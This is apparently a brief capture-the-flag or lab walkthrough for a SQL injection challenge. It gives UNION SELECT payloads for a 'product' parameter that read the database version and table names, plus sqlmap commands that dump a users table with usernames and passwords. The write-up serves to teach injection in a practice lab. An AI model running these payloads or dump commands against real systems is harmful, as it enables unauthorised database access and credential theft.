Injection 0x03 [Challenge]

product=Tanjyoubi Sushi Rack' union select null,null,null,version()#

We can see the injection0x03_users

product=Tanjyoubi Sushi Rack' union select null,null,null,table_name from information_schema.tables#

We can see the column name like usernaem and password

Then we can see the username

We can see the password

use sqlmap

save the request to txt file

First do this 

sqlmap -r injection3.txt

then

sqlmap -r injection3.txt --dump 
sqlmap -r injection3.txt --dump -T injection0x03_users
PreviousInjection 0x02NextInjection 0x04

Last updated